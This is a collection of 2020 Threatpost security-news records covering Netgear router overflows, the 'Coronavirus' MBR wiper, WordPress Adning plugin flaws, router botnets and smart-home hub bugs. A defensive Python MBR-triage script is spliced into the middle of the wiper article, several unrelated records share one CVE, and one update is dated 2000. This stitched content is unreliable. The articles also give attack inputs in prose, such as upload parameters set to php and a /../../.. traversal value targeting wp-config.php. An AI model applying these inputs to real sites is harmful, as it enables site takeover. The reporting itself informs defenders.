which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this flaw to execute code in the context of root, according to ZDI.\n\n\u201cGiven the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines,\u201d according to ZDI. \u201cOnly the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting.\u201d\n\nThe flaw was reported to Netgear on Jan. 8, 2020, and on June 15, 2020 the security advisory for the flaw was publicly released without a patch available. Additionally, a PoC exploit was published by the [GRIMM blog on June 15.](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>)\n\nNetgear has rolled out patches for 34 of the vulnerable models since the flaw was disclosed. That includes releasing \u201csecurity hotfixes\u201d for the models, which are fixes that are applied on top of existing, fully tested firmware.\n\n\u201cReleasing hotfixes allows Netgear to quickly update existing products and streamline the firmware verification process without going through full regression testing,\u201d according to Netgear. \u201cThese hotfixes are targeted at specific security issues and should have minimal effect on other areas of the product\u2019s code.\u201d\n\n## **Patch Timeline Backlash **\n\nSeveral security experts are criticizing Netgear for its patching policies and procedures. 
Brian Gorenc, senior director of vulnerability research and head of Trend Micro\u2019s Zero Day Initiative (ZDI) program, told Threatpost that the vulnerabilities disclosed represent some of the most severe bug categories available.\n\n\u201cUnfortunately, there are too many examples of vendors abandoning devices that are still in wide use \u2013 sometimes even when they are still available to purchase,\u201d Gorenc told Threatpost. \u201cMaybe we need to recommend manufacturers who support their products for longer \u2013 especially in our digitally connected lives. If we reward good communications and long-term support from vendors, maybe this abandonment problem will get better.\u201d\n\nZach Varnell, senior AppSec consultant at nVisium, said that the disclosure on this vulnerability \u201cappears to be more than generous since the researcher followed responsible disclosure practices and even gave an extension when asked for it.\u201d\n\n\u201cIt\u2019s unfortunate for anyone who owns one of those routers but that\u2019s the reality of product lifecycles,\u201d said Varnell. \u201cBasically everything \u2013 including software, toys, cars, electronics, appliances \u2013 will reach an age where their manufacturer will no longer support them. The duration of support varies widely and software tends to be on the shorter side since new development is done much more rapidly than hardware.\u201d\n\n\u201cConsumers should always ensure their devices are still supported by manufacturers and check the available support before purchasing a new device,\u201d said Gorenc.\n\nVulnerabilities in routers have been discovered several times over the past year. In March, [Netgear warned users](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) of a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. 
In July, a pair of [flaws in ASUS routers](<https://threatpost.com/asus-home-router-bugs-snooping-attacks/157682/>) for the home were uncovered that could allow an attacker to compromise the devices \u2013 and eavesdrop on all of the traffic and data that flows through them.\n\n_This article was updated on Aug. 4 at 11:30 am ET with further comments from Netgear. _\n
", "cvss3": {}, "published": "2020-08-03T19:03:46", "type": "threatpost", "title": "Netgear Won't Patch 45 Router Models Vulnerable to Serious Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-03T19:03:46", "id": "THREATPOST:9AADE8E4BD604BE3415C6DD56ECA3640", "href": "https://threatpost.com/netgear-wont-patch-45-router-models-vulnerable-to-serious-flaw/157977/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:51", "description": "A new Windows malware has emerged that makes disks unusable by overwriting the master boot record (MBR). It takes its cue from the COVID-19 pandemic, calling itself simply \u201cCoronavirus.\u201d\n\nOverwriting the MBR is the same trick that the infamous NotPetya wiper malware used in 2017 in a campaign that caused widespread, [global financial damage](<https://threatpost.com/pharmaceutical-giant-still-feeling-notpetyas-sting/127130/>).\n\nWorryingly, according to the SonicWall Capture Labs Threat Research team, the fresh malware strain is also a destructive trojan \u2014 though not as destructive as other wipers. And like its namesake, there\u2019s no obvious cure. In [a posting on Tuesday](<https://securitynews.sonicwall.com/xmlpost/coronavirus-trojan-overwriting-the-mbr/>), researchers explained that victims of the Coronavirus trojan find themselves with a gray screen and a blinking cursor with a simple message, \u201cYour computer has been trashed.\u201d\n\nThe novel coronavirus, and the disease it causes, COVID-19, has provided plenty of fodder for cybercriminals looking to capitalize on the global concern around the pandemic. 
For instance, a recent spate of phishing attacks has used [the promise of financial relief](<https://threatpost.com/coronavirus-financial-relief-phishing-spike/154358/>) due to the disease as a lure. However, the operator behind this malware takes it one step further, going so far as to take the coronavirus as its name and infection theme.\n\nAs far as that infection routine, the malware can be delivered in any of the usual ways \u2013 as a malicious email attachment, file download, fake application and so on.\n\nUpon execution, the malware starts its process by installing a number of helper files, which are placed in a temporary folder. The malware cleaves tight to its pandemic theme: An installer (a helper file named \u201ccoronavirus.bat\u201d) sets up the attack by creating a hidden folder named \u201cCOVID-19\u201d on the victim machine. The previously dropped helper files are then moved there, in an effort to go unnoticed until its goal is achieved.\n\nAfter that, the installer disables Windows Task Manager and User Access Control (UAC) in a further stab at obfuscation, according to the analysis. It also changes the victim\u2019s wallpaper, and disables options to add or modify that wallpaper after the change is made. It also adds entries in registry for persistence, and then sets about rebooting to finish the installation.\n\nThe process run.exe creates a batch file named run.bat to ensure the registry modifications done by \u201ccoronavirus.bat\u201d are kept intact during the reboot process, according to SonicWall.\n\nAfter reboot, the infection executes two binaries. One, \u201cmainWindow.exe,\u201d displays a window with a picture of the coronavirus itself, with two buttons. 
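For a responder, the useful question after an MBR-overwriting wiper like this one is whether only the bootstrap code in sector 0 was replaced or whether the partition table went with it, because that decides whether the volumes can simply be mounted from another OS (the recovery path SonicWall notes for this sample) or need the table reconstructed first. The Python below is an added example, not code from SonicWall's analysis or from the malware itself. It builds three constructed 512-byte sectors (a clean MBR, the same disk with only the bootstrap replaced, and a fully zeroed sector), parses the boot signature and partition entries, and reports which recovery path applies. The bootstrap bytes are placeholders, not the trojan's actual code.

```python
import hashlib
import struct
from typing import Dict, List, Optional

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"       # bytes 510-511 of a valid MBR
PARTITION_TABLE_OFFSET = 446       # four 16-byte partition entries follow the bootstrap code
ENTRY_FMT = "<B3sB3sII"            # status, CHS start, type, CHS end, LBA start, sector count


def build_mbr(bootstrap: bytes, partitions: List[Dict[str, int]]) -> bytes:
    """Assemble a 512-byte MBR for the demo (constructed test data, not a
    sector image taken from an infected machine)."""
    sector = bytearray(SECTOR_SIZE)
    code = bootstrap[:PARTITION_TABLE_OFFSET]
    sector[:len(code)] = code
    for i, p in enumerate(partitions[:4]):
        struct.pack_into(ENTRY_FMT, sector, PARTITION_TABLE_OFFSET + 16 * i,
                         0x80 if p.get("bootable") else 0x00, b"\0\0\0",
                         p["type"], b"\0\0\0", p["lba_start"], p["sectors"])
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


def parse_mbr(sector: bytes) -> Dict:
    """Split a first sector into boot signature, bootstrap hash and partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    partitions = []
    for i in range(4):
        status, _, ptype, _, lba, count = struct.unpack_from(
            ENTRY_FMT, sector, PARTITION_TABLE_OFFSET + 16 * i)
        if ptype != 0:                       # type 0 marks an unused entry
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba, "sectors": count})
    return {
        "signature_ok": sector[510:512] == BOOT_SIGNATURE,
        "bootstrap_sha256": hashlib.sha256(sector[:PARTITION_TABLE_OFFSET]).hexdigest(),
        "partitions": partitions,
    }


def assess(sector: bytes, known_good_bootstrap_sha256: Optional[str] = None) -> List[str]:
    """Triage findings for sector 0 of a suspect disk."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature missing: sector zeroed or fully overwritten")
    if not info["partitions"]:
        findings.append("partition table empty: volumes need table reconstruction before mounting")
    else:
        findings.append("partition table intact: volumes can be mounted from another OS")
    if known_good_bootstrap_sha256 and info["bootstrap_sha256"] != known_good_bootstrap_sha256:
        findings.append("bootstrap code differs from known-good: MBR code replaced")
    return findings


# Constructed samples: placeholder loader bytes, a placeholder lock-screen stub,
# and one NTFS-type partition. None of this is the trojan's real code.
CLEAN_BOOTSTRAP = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 100
TRASHED_BOOTSTRAP = b"Your computer has been trashed." + b"\x00" * 100
ONE_PARTITION = [{"bootable": True, "type": 0x07, "lba_start": 2048, "sectors": 204800}]

CLEAN_MBR = build_mbr(CLEAN_BOOTSTRAP, ONE_PARTITION)
TRASHED_MBR = build_mbr(TRASHED_BOOTSTRAP, ONE_PARTITION)   # bootstrap replaced, table kept
ZEROED_MBR = bytes(SECTOR_SIZE)                              # whole sector wiped
GOOD_HASH = parse_mbr(CLEAN_MBR)["bootstrap_sha256"]

if __name__ == "__main__":
    for name, sector in (("clean", CLEAN_MBR), ("trashed", TRASHED_MBR), ("zeroed", ZEROED_MBR)):
        print(name, assess(sector, GOOD_HASH))
```

On a real disk image, `sector 0` is the first 512 bytes of the raw device, and the known-good bootstrap hash comes from a clean install of the same Windows version; the example keeps the partition-table and signature checks separate because a wiper can destroy one without the other.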
At the top of the window, the victim is notified that \u201ccoronavirus has infected your PC!\u201d\n\nThe two buttons read \u201cRemove virus\u201d and \u201cHelp.\u201d The former does nothing when clicked; the latter brings up a pop-up that tells victims to \u201cnot wast [sic] your time\u201d because \u201cyou can\u2019t terminate this process!\u201d\n\nThe other binary carries out the meat of the attack: It\u2019s responsible for overwriting the MBR.\n\n\u201cThe original MBR is first backed up in the first sector before it is overwritten with new one, [and the] MBR is overwritten with the new code,\u201d according to the researchers.\n\nOnce the overwrite is complete, the victim\u2019s display is changed to a simple grey screen delivering the bad news:\n\n[Screenshot: the grey screen shown after the MBR overwrite](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/01164031/corona-trojan-grey-screen.png>)\n\nSonicWall told Threatpost in an email interview that it was able to analyze the sample after it was uploaded to VirusTotal. So far, there haven\u2019t been many instances of \u201cCoronavirus\u201d observed in the wild, and little is known about its targeting or spreading mechanisms.\n\nThe team also told Threatpost that the good news is that this is not as dangerous as other wiper strains.\n\n\u201cEven if the MBR is not restored\u2026data can still be accessed/recovered by mounting the drive,\u201d the firm noted. \u201cThe MBR [also] can be potentially restored, but it is not easy and [requires deep technical knowledge](<https://neosmart.net/wiki/fix-mbr/>).\u201d\n
", "cvss3": {}, "published": "2020-04-01T21:07:22", "type": "threatpost", "title": "Wiper Malware Called \"Coronavirus\" Spreads Among Windows Victims", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T21:07:22", "id": "THREATPOST:F18124E38523CE6CF73ACDCF7DBF78BC", "href": "https://threatpost.com/wiper-malware-coronavirus-windows-victims/154368/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:12", "description": "The Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nThe plugin\u2019s author, Tunafish, has rolled out a patched version (v.1.5.6), which site owners should update to as soon as possible. No CVE was issued.\n\nThe bug could allow complete site takeover, earning it a 10 out of 10 on the CVSS bug-severity scale. Also, it has already been the subject of in-the-wild attacks, according to [an analysis](<https://www.wordfence.com/blog/2020/07/critical-vulnerabilities-patched-in-adning-advertising-plugin/>) from Wordfence issued on Wednesday. 
That said, the firm said the attacks so far have been limited in scope and scale.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw exists in the Adning plugin\u2019s ability to allow users to upload banner images, researchers said.\n\n\u201cIn order to provide this functionality, it used an AJAX action, _ning_upload_image,\u201d according to the researchers. \u201cUnfortunately, this AJAX action was available with a nopriv_ hook, meaning that any visitor to the site could make use of it, even if they were not logged in. Additionally, the function called by this AJAX action also failed to make use of a capability check or a nonce check.\u201d\n\nThis function also allowed the user to supply the \u201callowed\u201d file types \u2013 which means that an unauthenticated attacker could upload malicious code by sending a POST request to wp-admin/admin-ajax.php.\n\nThis could be performed \u201cwith the action parameter set to _ning_upload_image the allowed_file_types set to php and a files parameter containing a malicious PHP file,\u201d researchers said. \u201cAlternatively, an attacker could set the allowed_file_types to zip and upload a compressed archive containing a malicious PHP file, which would be unzipped after upload.\u201d\n\n## **A Second Bug**\n\nWordfence researchers also found a second security vulnerability, which allows unauthenticated arbitrary file deletion via path traversal.\n\nCarrying a high-severity CVSS score of 8.7, this bug is also patched in v.1.5.6.\n\n\u201cIn order to delete any uploaded images, the plugin also registered another ajax action, _ning_remove_image, which also used a nopriv_ hook,\u201d according to the analysis. \u201cAs with the upload vulnerability, this function did not perform a capability check or a nonce check. 
As such it was possible for an unauthenticated attacker to delete arbitrary files using path traversal.\u201d\n\nAlso, according to Wordfence, if an attacker were able to delete the specific file wp-config.php, the site would be reset, offering attackers an opportunity to set it up again. They could use their own remote databases under their control, effectively replacing the site\u2019s content with their own content.\n\n\u201cThis might require an extra step of preparation, which is that the wp-content/uploads/path folder would need to exist,\u201d according to Wordfence. \u201cHowever, since the previously mentioned arbitrary file-upload vulnerability allowed for directory creation, this was not a major obstacle. Once the directory was created, an attacker could send a POST request to wp-admin/admin-ajax.php with the action parameter set to _ning_remove_image, the uid parameter set to /../../.. and the src parameter set to wp-config.php.\u201d\n\n## **WordPress Plugins: A Weak Link**\n\nWordPress plugins continue to crop up with concerning vulnerabilities that put sites at risk. In May for instance, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>). Also that month, a pair of security vulnerabilities (one of them critical), in the WordPress search engine optimization (SEO) plugin known as Rank Math, [were found](<https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/>). 
They could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. Rank Math is a WordPress plugin with more than 200,000 installations.

In March, another critical vulnerability in a WordPress plugin known as “ThemeREX Addons” [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution on 44,000 websites.

Also in March, two vulnerabilities – including a high-severity flaw – [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to inject malicious JavaScript into a popup – potentially opening up more than 100,000 websites to takeover.

And in February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>). The flaw could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.

_BEC and enterprise email fraud is surging, but DMARC can help – if it’s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), “DMARC: 7 Common Business Email Mistakes.” This technical “best practices” session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._

Record: “Advertising Plugin for WordPress Threatens Full Site Takeovers” (Threatpost; published 2020-07-08T20:12:05; modified 2020-07-08T20:12:05; id THREATPOST:49EFC5B6CFCA04F105A001AAFED52548; cvelist CVE-2020-5135; cvss score 0.0, vector NONE) – https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/

---

Record last seen 2020-10-14T22:23:48:

UPDATED

Researchers this week said they discovered an unpatched zero-day vulnerability in firmware for [Netgear](<https://www.netgear.com/>) routers that puts [79 device models](<https://www.bleepingcomputer.com/news/security/79-netgear-router-models-risk-full-takeover-due-to-unpatched-bug/>) at risk of full takeover.

Netgear has since issued several hot fixes, [available here](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).

The flaw, a memory-safety issue present in the firmware’s httpd web server, allows attackers to bypass authentication on affected installations of Netgear routers, according to two separate reports: [one on the Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI) by a researcher called “d4rkn3ss” from the Vietnam Posts and Telecommunications Group; and a separate [blog post](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>) by Adam Nichols of cybersecurity firm [Grimm](<https://blog.grimm-co.com/>).

“The specific flaw exists within the httpd service, which listens on TCP Port 80 by default,” according to the ZDI report, which covers the bug’s presence in the R6700 series Netgear routers. “The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer.”

Authentication is not required to exploit the vulnerability, which attackers can use to gain root privileges, according to the report.

ZDI said it informed Netgear of the vulnerability in January. The vendor had asked for an extension until the end of June for public disclosure, which ZDI declined.

For his part, Nichols discovered the flaw initially in the Netgear R7000 router series, but eventually identified 79 different Netgear devices and 758 firmware images that included a vulnerable copy of the web server.

“This vulnerability affects firmwares as early as 2007 (WGT624v4, version 2.0.6),” he said in his post. “Given the large number of firmware images, manually finding the appropriate gadgets is infeasible. Rather, this is a good opportunity to automate gadget detection.”

Nichols said that the problem lies in the lack of support for a feature called [stack cookies](<https://en.wikipedia.org/wiki/Stack_buffer_overflow#Stack_canaries>), or stack canaries – a reference to the use of a “canary in a coal mine” – which are used to detect a stack buffer overflow before execution of malicious code can occur, he explained.
While some Netgear routers support this feature – namely, the D8500 firmware version 1.0.3.29 and the R6300v2 firmware versions 1.0.4.12-1.0.4.20 – most others do not, he said.

“Later versions of the D8500 and R6300v2 stopped using stack cookies, making this vulnerability once again exploitable,” Nichols explained in the post. “This is just one more example of how SOHO device security has fallen behind as compared to other modern software.”

Web servers in the firmware of SOHO devices in general are often the most vulnerable aspect of the system, as they “must parse user input from the network and run complex CGI functions that use that input,” he said.

“Furthermore, the web server is written in C and has had very little testing, and thus it is often vulnerable to trivial memory-corruption bugs,” Nichols said.

## **Exploitation**

The zero-day vulnerability can be exploited in two ways, Nichols explained in his post. One way is to exploit the recv function used in the HTTP parser in the web server through a series of steps that eventually lead to a stack-buffer overflow.

Attackers also can use a cross-site request forgery (CSRF) attack to exploit the vulnerability, though the attacker needs to know the model and version of the router they’re targeting to pull this off successfully, he explained.

“If a user with a vulnerable router browses to a malicious website, that website could exploit the user’s router … by serving an HTML page which sends an AJAX request containing the exploit to the target device,” Nichols said. “However, as the CSRF web page cannot read any responses from the target server, it is not possible to remotely fingerprint the device.”

One mitigation for the vulnerability is to restrict interaction with the service to trusted machines, according to the ZDI report.

“Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it,” according to the report. “This could be accomplished in a number of ways, most notably with firewall rules/whitelisting.”

In March, [Netgear patched](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. It also addressed two high-severity bugs impacting Nighthawk routers, 21 medium-severity flaws and one rated low.

_**This story was updated June 25, 2000 at 11:30 a.m. ET to include information on Netgear’s hot fixes.**_

_Insider threats are different in the work-from-home era. On [June 24 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>), join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyer, for a FREE webinar, “The Enemy Within: How Insider Threats Are Changing.” Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it. [Please register here](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>) for this Threatpost webinar._

Record: “Netgear Zero-Day Allows Full Takeover of Dozens of Router Models” (Threatpost; published 2020-06-19T13:05:37; modified 2020-06-19T13:05:37; id THREATPOST:DF35DF449CB3A8F93C405B227A00E117; cvelist CVE-2020-5135; cvss score 0.0, vector NONE) – https://threatpost.com/netgear-zero-day-takeover-routers/156744/

---

Record last seen 2020-10-14T22:26:16:

The Mootbot botnet has been using a pair of zero-day exploits to compromise multiple types of fiber routers. According to researchers, other botnets have attempted to do the same, but have so far failed.

According to researchers at NetLab 360, the operators of the Mootbot botnet in late February started to exploit a zero-day bug found in nine different types of fiber routers used to provide internet access and Wi-Fi to homes and businesses (including the Netlink GPON router). The flaw is a remote code-execution bug with a public proof-of-concept (PoC) exploit – but for it to be used successfully to compromise a target router, it must be paired with a second vulnerability.

“It is likely most of the vendors are OEM products of the same original vendor,” the firm explained in a [recent posting](<https://blog.netlab.360.com/multiple-fiber-routers-are-being-compromised-by-botnets-using-0-day-en/>). However, NetLab 360 said that it wouldn’t release the original vendor’s name nor details of the second bug, because the vendor told the security firm that it didn’t see the bug as viable.

“On March 17, we confirmed the exploit was a 0-day and reported the result to CNCERT,” according to the analysis.
“We also contacted the vendor but were told this problem should not be happening because the default config of the device should not have this issue (the reality is different). So they won’t take this case from us.”

Despite that initial assessment, PoC code for the bug emerged on ExploitDB a day later. And a day after that, on March 19, the firm saw attacks in the wild using the PoC to attempt to spread the Gafgyt botnet. A few days later, the botnet had adopted the PoC as part of a worming attempt to move from router to router. Meanwhile, on March 24, another wave of exploit attempts emerged using the PoC, this time trying to spread the Fbot botnet.

“The PoC leaves out a crucial prerequisite – another vulnerability needs to be used together with this PoC for it to work,” researchers explained. “So, a successful execution of the injected commands will not have the target device compromised.”

Moobot is a new botnet family based on [Mirai botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>), which targets internet of things (IoT) devices. While most IoT botnets go after gear that may have weak or default passwords, Mootbot stands out for its use of zero-day exploits, researchers said. It’s worth noting that the malware [was also seen in March](<https://threatpost.com/hackers-exploited-0-day-cctv-camera/154051/>) using multiple zero days to target LILIN DVR and IP cameras.

Though it didn’t release details of the second success factor in the kill chain, NetLab 360 recommended that, to protect against the threat, users that have fiber-based internet access routers should check and update their device firmware, and check whether there are default accounts that should be disabled.

Jack Mannino, CEO at nVisium, told Threatpost that the [focus on routers](<https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/>) offers attackers certain advantages.

“Controlling network infrastructure will always be an appealing attacker goal because of the springboard it provides for launching future attacks,” he said. “As a software developer, it’s important to consider that the networks your users access your product from may be compromised, and build this into your threat models. Whether it’s the level of access it provides to network traffic, or the chokepoints and amplifiers for DDoS attacks they present, previous botnets, such as Mirai, gave us a glimpse into what these campaigns can achieve. More security teams focus on their Patch Tuesday fixes than updating the devices they frequently expose directly to the internet.”

_Worried about your cloud security in the work-from-home era? On April 23 at 2 p.m. ET, join DivvyCloud and Threatpost for a FREE webinar, [A Practical Guide to Securing the Cloud in the Face of Crisis](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>). Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 – and during all times of crisis. [Please register here](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>) for this sponsored webinar._

Record: “Mootbot Botnet Targets Fiber Routers with Dual Zero-Days” (Threatpost; published 2020-04-20T20:51:59; modified 2020-04-20T20:51:59; id THREATPOST:E95F180BE3CA693890795666169A5F04; cvelist CVE-2020-5135; cvss score 0.0, vector NONE) – https://threatpost.com/mootbot-fiber-routers-zero-days/154962/

---

Record last seen 2020-10-14T22:25:06:

Cyberattackers are targeting a post-authentication remote code-execution vulnerability in Symantec Secure Web Gateways as part of new Mirai and Hoaxcalls botnet attacks.

Hoaxcalls first emerged in late March as a variant of the Gafgyt/Bashlite family; it’s named after the domain used to host its malware, Hoaxcalls.pw. Two new Hoaxcalls samples [showed up on the scene](<https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/>) in April, incorporating new commands from its command-and-control (C2) server. These included the ability to proxy traffic, download updates, maintain persistence across device restarts, prevent reboots and launch a larger number of distributed denial-of-service (DDoS) attacks.

It also incorporated a new exploit for infiltrating devices – an [unpatched vulnerability](<https://threatpost.com/flaws-zyxels-network-management-software/153554/>) impacting the ZyXEL Cloud CNM SecuManager that was disclosed in March.
Now, researchers at Palo Alto Networks’ Unit 42 division have observed that same version of the botnet exploiting a second unpatched bug, this time in Symantec Secure Web Gateway version 5.0.2.8, a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.

The Symantec bug was [disclosed in March](<https://code610.blogspot.com/2020/03/postauth-rce-in-symantec-web-gateway.html>). Since it affects older versions of the gateway, it will remain unpatched.

“On April 24, I observed samples of the same botnet incorporating an exploit targeting the EOL’d Symantec Secure Web Gateway v5.0.2.8, with an HTTP request in the format: POST /spywall/timeConfig.php HTTP/1.1,” said Unit 42 researcher Ruchna Nigam, in a [Thursday post](<https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/>). “Some samples reach out to a URL for a public file upload service (plexle[.]us) where the post-exploitation payload is hosted. The URL contacted for the update serves a shell script that downloads and executes binaries from attacker-controlled URLs.”

Meanwhile, Nigam also saw a [Mirai variant](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) campaign in May spreading using that same vulnerability; oddly, the malware itself lacks any DDoS capabilities, according to the researcher. As such, the binary seems to be a first-stage loader.

“Samples of this campaign surfaced early May, built on the Mirai source code, and are packed with a modified version of UPX by using a different 4-byte key with the UPX algorithm,” according to Nigam. “Another deviation from the Mirai source-code is the use of all of ten 8-byte keys that are cumulatively used for a byte-wise string encryption scheme.”

The vulnerability, as mentioned, is a post-authentication bug, meaning that the exploit is only effective for authenticated sessions. It’s also no longer present in the latest version of the Symantec Web Gateway, version 5.2.8, so updated devices are protected.

Researchers at Radware previously noted that Hoaxcalls operators seem very quick to weaponize newly discovered bugs, like the ZyXel vulnerability. Unit 42’s Nigam came to a similar conclusion:

“The use of the exploit in the wild surfaced only a few days after the publication of the vulnerability details, highlighting the fact that the authors of this particular botnet have been pretty active in testing the effectiveness of new exploits as and when they are made public,” according to the researcher.

_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On [June 3 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>), join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, [Taming the Unmanaged and IoT Device Tsunami](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>). Get exclusive insights on how to manage this new and growing attack surface. [Please register here](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>) for this sponsored webinar._

Record: “Hoaxcalls Botnet Exploits Symantec Secure Web Gateways” (Threatpost; published 2020-05-15T20:41:24; modified 2020-05-15T20:41:24; id THREATPOST:6A1329627DFBA3501BA187A580E968D5; cvelist CVE-2020-5135; cvss score 0.0, vector NONE) – https://threatpost.com/hoaxcalls-botnet-symantec-secure-web-gateways/155806/

---

Record last seen 2020-10-14T22:26:19:

Three different connected home hubs – Fibaro Home Center Lite, Homematic Central Control Unit (CCU2) and Elko’s eLAN-RF-003 – are vulnerable in their older versions to serious bugs that would allow information disclosure, man-in-the-middle (MiTM) attacks and unauthenticated remote code execution (RCE), according to researchers.

Home hubs are used to connect a range of smart devices (including appliances, IP cameras, smart thermostat and doorbell gadgets, connected TVs, Google Home and Amazon Alexa offerings, plus laptops, phones and the like). Researchers at ESET pointed out in [Tuesday research](<https://www.welivesecurity.com/2020/04/22/serious-flaws-smart-home-hubs-is-your-device-among-them/>) that an attacker that compromises one of these could in theory gain full access to all of the peripheral devices connected to it – a scenario that could also impact businesses given that more people are working from home.

The flaws were disclosed by ESET just this week, though most of them were fixed in previous updates.
They still impact a number of IoT devices, the analyst firm said – likely because consumers don’t tend to update their device firmware very often, if at all; and a handful of the flaws remain unaddressed.

**Fibaro Home Center Lite**

Fibaro Home Center Lite (firmware version 4.170) was found by the ESET IoT research team to be vulnerable to a range of bugs. The problems included TLS connections that were vulnerable to MitM attacks thanks to missing certificate validation – which would open the door to command injection; the use of a very short, hardcoded password stored in the file /etc/shadow in the device’s firmware, ripe for brute-forcing; the use of a hardcoded password salt; and a vulnerable weather service API that leaked the exact GPS coordinates of the device due to the use of unencrypted HTTP communications.

Some of these could be chained together to create an SSH backdoor for full control of a targeted device.

For instance, ESET researchers were able to create their own MiTM server, thanks to the fact that the Fibaro Home Center Lite communicates with its cloud server via a standard SSH tunnel, but fails to validate the certificate for TLS communications with the server.

“Fibaro Home Center Lite sends two separate TLS-encrypted requests asking for the SSH server’s hostname and listening port,” the researchers explained. “Based on the information returned, Fibaro Home Center Lite creates a secured connection via an SSH tunnel to the specified SSH server.”

Because of the failure to perform certificate verification on the TLS requests, any attacker can use fake certificates signed by their proxy server to accept the public key of the targeted device and mimic the original Fibaro server.

“To make matters worse, intercepted TLS requests – intended to create the SSH tunnel between the device and the legitimate server – are vulnerable to command injection,” according to the research. “By using the MitM server, attackers can replace the address of the original server lb-1.eu.ra.fibaro.com with whatever they wish.”

For example, the attacker can generate a malicious response with a command injection that causes the device’s initialization shell script to fail. That prompts the device to request the server’s IP address once again – a request that can now be intercepted by the attacker and replaced with a different tunnel.

“Another tunnel is created, through which the attacker’s SSH backdoor port is forwarded,” according to the analysis. “This reroutes the communication from both ports (SSH 666, HTTP 80) to the attacker’s MitM server. From this point on, the attacker has root access to Fibaro Home Center Lite.”

